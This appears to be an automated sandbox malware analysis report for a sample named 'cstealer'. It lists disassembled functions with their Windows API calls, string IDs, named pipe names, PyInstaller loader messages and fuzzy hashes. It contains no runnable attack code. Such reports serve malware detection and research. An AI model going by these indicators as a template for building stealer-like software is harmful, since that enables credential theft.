• API String ID: 2895956056-3524285272
• Opcode ID: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
• Instruction ID: cfdbd3fd7b660c0a2c424b5b6f8c1a633897912c8092c1956966af3f6bab0495
• Opcode Fuzzy Hash: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
• Instruction Fuzzy Hash: 07414331A0878281DA30DB64E5452AAB3D0FF94B64F500776EAAD877D5DF7CD558CB00
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
• API String ID: 2171963597-1373409510
• Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
• Instruction ID: 752ea400637ce8e33754e154e28fb255856b1936b70075aafb157cd863fa7752
• Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
• Instruction Fuzzy Hash: 27213D72619B40C7EB208FA9F54875A63A1FB89BA4F500A15EB5D06BE8DF7CC159CF00
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction ID: a0c62df6dc8890b2da45e52d0f666dc37eb92a871148ea2912857b43576cc31c
• Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction Fuzzy Hash: 7DE17E7260A7408AEF709FA9D44839D77A0FB45B98F201D15EE8D57F9AEB34C5A1CB00
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction ID: a7f562649a02862e517ef090344a41ddd1547fb57f37995e53499a99213f1980
• Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction Fuzzy Hash: 2BE1A47260EB408EEB70DFA9D44939DB7A6FB45798F100915EE8D57B59CB34C4A2CB00
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
• Instruction ID: e10033a5f5473bb22071ffcc9ecd8853d5c128d29529a3a180ff1219f1ff284f
• Opcode Fuzzy Hash: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
• Instruction Fuzzy Hash: 13D18F32A087428AEB309F2594402FD37E0FB55B98F500575DE8D9BBA5DF38EA99C700
APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF6957FFD5A,?,?,-00000018,00007FF6957FBB0B,?,?,?,00007FF6957FBA02,?,?,?,00007FF6957F698E), ref: 00007FF6957FFB3C
• GetProcAddress.KERNEL32(?,?,?,00007FF6957FFD5A,?,?,-00000018,00007FF6957FBB0B,?,?,?,00007FF6957FBA02,?,?,?,00007FF6957F698E), ref: 00007FF6957FFB48
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
• Instruction ID: 040e25986f8faf533a0711932ce9eb312c5fa3fcb837093e04cfa924e06dba82
• Opcode Fuzzy Hash: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
• Instruction Fuzzy Hash: 0241EE32B19A1281FA36DF26A9146B522D1FF09FA0F094976DD1DDB794EE3CEE449300
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction ID: 170ddb6f3a3a15e4d6a062cbbe8144e3a48732fb61b4da7a746edd872212fd45
• Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction Fuzzy Hash: 3141F77131BA009AEE35CFAEA908B562391BF44BA0F544D25AD0D87BC9FE3CC4658B44
APIs
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E8A47
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E8A9E
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
• API String ID: 626452242-27947307
• Opcode ID: 89553e7cd300324a6f724f73f484e3f7697aeb2be2e7a1e8a5647cf5d5c3735f
• Instruction ID: ded981255f39ca838bd8fdeebbea47581dc0c4f625f9c4f347b49f5f9e0b49fc
• Opcode Fuzzy Hash: 89553e7cd300324a6f724f73f484e3f7697aeb2be2e7a1e8a5647cf5d5c3735f
• Instruction Fuzzy Hash: CA418F32A09B8282E670CF15B8411BAB6E1FB84B90F544575DE8D8BBA4DF3CD956D700
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                            • String ID: d
                                                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                            • Instruction ID: 0542fbcdb95e2b0466278a15cbbd2c344923ebf524bbccbbf0f03c0051450a34
                                                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                            • Instruction Fuzzy Hash: 2B416373215B84CAEB60CFA5E45839A77A1F784B98F448515DB8D0BB58DF3CC555CB00
                                                                                                                                                            APIs
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF6957E39CA), ref: 00007FF6957E8F31
                                                                                                                                                              • Part of subcall function 00007FF6957E29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6957E8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E29F4
                                                                                                                                                              • Part of subcall function 00007FF6957E29C0: MessageBoxW.USER32 ref: 00007FF6957E2AD0
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF6957E39CA), ref: 00007FF6957E8FA5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                            • API String ID: 3723044601-27947307
                                                                                                                                                            • Opcode ID: 4b8f80f614b111e99d886447c0377d3fa2ad0085ce50da6436ff273b72e0facb
                                                                                                                                                            • Instruction ID: cf79d8ba8234ba8130926bf2f033509dd152023923e8a55abb3df6f8088f3fb7
                                                                                                                                                            • Opcode Fuzzy Hash: 4b8f80f614b111e99d886447c0377d3fa2ad0085ce50da6436ff273b72e0facb
                                                                                                                                                            • Instruction Fuzzy Hash: 3B218261B09B4285E720DF26E9440B9B2D2EF84F80F544576DA4D8BBA5EF3CEA458300
                                                                                                                                                            APIs
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000271DC67C7DE,?,?,?,?,?,?,?,?,00000271DC67CF9D,?,?,00000001), ref: 00000271DC67D087
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000271DC67C7DE,?,?,?,?,?,?,?,?,00000271DC67CF9D,?,?,00000001), ref: 00000271DC67D0A6
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000271DC67C7DE,?,?,?,?,?,?,?,?,00000271DC67CF9D,?,?,00000001), ref: 00000271DC67D0CE
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000271DC67C7DE,?,?,?,?,?,?,?,?,00000271DC67CF9D,?,?,00000001), ref: 00000271DC67D0DF
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000271DC67C7DE,?,?,?,?,?,?,?,?,00000271DC67CF9D,?,?,00000001), ref: 00000271DC67D0F0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID: 1%$Y%
                                                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                            • Instruction ID: 94d480aeb8751792b76ed29e937c36aebedea347c07b03b76ef13de8c4dea0b9
                                                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                            • Instruction Fuzzy Hash: DB11AC3030E24449FE78AFBD995E7A921415F943F0F245F24A82D06BEAFE38C4768E00
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction ID: 595853833a4a5a312de764f48ca070a042db4e53e70d922ebbfa6997deed1104
                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction Fuzzy Hash: 1881C37160F3418EFE729FED944939962D1AF45B80F544D259A0C87BDAFBB8C8658F00
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                                            • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                                            • API String ID: 3231891352-3501660386
                                                                                                                                                            • Opcode ID: 37f188308be49b72cd36607779045425a90e915aadacb2b24e56b1bac9d89fa7
                                                                                                                                                            • Instruction ID: be3970b5b4a5df2889ee01b90e3e55c642ea5611d0b213f7320b62fee4b0b65c
                                                                                                                                                            • Opcode Fuzzy Hash: 37f188308be49b72cd36607779045425a90e915aadacb2b24e56b1bac9d89fa7
                                                                                                                                                            • Instruction Fuzzy Hash: 01517D21A1D79251FA30AB25A9492F962D5DF84FD0F4441B1ED4ECE7E6EE2CFE088310
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6957E8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6957E2A9B), ref: 00007FF6957E8E1A
                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6957E7BB1,00000000,?,00000000,00000000,?,00007FF6957E153F), ref: 00007FF6957E768F
                                                                                                                                                              • Part of subcall function 00007FF6957E2B10: MessageBoxW.USER32 ref: 00007FF6957E2BE5
                                                                                                                                                            Strings
                                                                                                                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6957E7666
                                                                                                                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6957E76A3
                                                                                                                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6957E76EA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                            • API String ID: 1662231829-3498232454
                                                                                                                                                            • Opcode ID: 8f1df7902dca90666f1b86c52478fd4315f0811391686ba48ec9206ac8c96544
                                                                                                                                                            • Instruction ID: caf8561ee39be7d45f8ebf6057a2f9f58e85b00b84f327dd3758ba610d3db78c
                                                                                                                                                            • Opcode Fuzzy Hash: 8f1df7902dca90666f1b86c52478fd4315f0811391686ba48ec9206ac8c96544
                                                                                                                                                            • Instruction Fuzzy Hash: A8319351B1D78250FA34EB25E9552FA52D1EF99FC0F440472DA4ECA6E6EE2CEA088700
                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6957EE67A,?,?,?,00007FF6957ED5AC,?,?,?,00007FF6957ED1A1), ref: 00007FF6957EE44D
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6957EE67A,?,?,?,00007FF6957ED5AC,?,?,?,00007FF6957ED1A1), ref: 00007FF6957EE45B
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6957EE67A,?,?,?,00007FF6957ED5AC,?,?,?,00007FF6957ED1A1), ref: 00007FF6957EE485
                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6957EE67A,?,?,?,00007FF6957ED5AC,?,?,?,00007FF6957ED1A1), ref: 00007FF6957EE4F3
                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6957EE67A,?,?,?,00007FF6957ED5AC,?,?,?,00007FF6957ED1A1), ref: 00007FF6957EE4FF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                            • Opcode ID: 5cef7e97cf10635b7adbe76254dad29ae16abfe91812266f9aed7336451ff82a
                                                                                                                                                            • Instruction ID: 248c34c777780671a2cd98c86f2d16b7356d4e472cb8582774f00aed7330f07c
                                                                                                                                                            • Opcode Fuzzy Hash: 5cef7e97cf10635b7adbe76254dad29ae16abfe91812266f9aed7336451ff82a
                                                                                                                                                            • Instruction Fuzzy Hash: D0319021B1AB5291EE72DB56A4005F563D4FF45FA0F190975ED5D8A7A0EE3CEA888300
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                            • Instruction ID: d69fc1ba0d66717e41ea10154f74b81209c27d9553472f67a68ddac795b43839
                                                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                            • Instruction Fuzzy Hash: DA31C43121BA40A9EE71DFCAA40876523D4BF48BA0F590E259D1D4BBD5FF38C4678B10
                                                                                                                                                            APIs
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6957E2A9B), ref: 00007FF6957E8E1A
                                                                                                                                                              • Part of subcall function 00007FF6957E29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6957E8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E29F4
                                                                                                                                                              • Part of subcall function 00007FF6957E29C0: MessageBoxW.USER32 ref: 00007FF6957E2AD0
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6957E2A9B), ref: 00007FF6957E8EA0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                            • API String ID: 3723044601-876015163
                                                                                                                                                            • Opcode ID: 7f97f1849ec178b0ff8ea583991b98c80d8c160445cd7602e716bcd8403426a8
                                                                                                                                                            • Instruction ID: 71e499b9b94657c948a31f1614a3b3f3240f011cbd7f5d477985739610e41015
                                                                                                                                                            • Opcode Fuzzy Hash: 7f97f1849ec178b0ff8ea583991b98c80d8c160445cd7602e716bcd8403426a8
                                                                                                                                                            • Instruction Fuzzy Hash: 1C216722B09A5281EB60DB25F5411BAA3E1FB84BC4F584572DB4CD7B79EE3CD9458700
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                            • Opcode ID: dd5ac87c9cee46b5c830e3e8782148364abc7e85d8a6069d740a4c3542b67def
                                                                                                                                                            • Instruction ID: 85d18df85464aac1c443ebe9778c8f449eecf70b0528dcef90f87994c5228326
                                                                                                                                                            • Opcode Fuzzy Hash: dd5ac87c9cee46b5c830e3e8782148364abc7e85d8a6069d740a4c3542b67def
                                                                                                                                                            • Instruction Fuzzy Hash: E7213731A0C74281EB209F65F5841BAA3E0EF85FA0F154275DA9D87AE4DF7CD9598B00
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: 54b775f8dcc7592bd86d56be8aaa54ab235b08f202956fce910fbbd8e275d41b
                                                                                                                                                            • Instruction ID: 8d7333d430c35ad1ceb9c017db36b4621232edb7877d179c37ea7b4d6f46207a
                                                                                                                                                            • Opcode Fuzzy Hash: 54b775f8dcc7592bd86d56be8aaa54ab235b08f202956fce910fbbd8e275d41b
                                                                                                                                                            • Instruction Fuzzy Hash: 0C216D20B0C61252F679E331965517966E2DF44FB0F244AB5EC3ECBAC6DE2CBE006B00
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
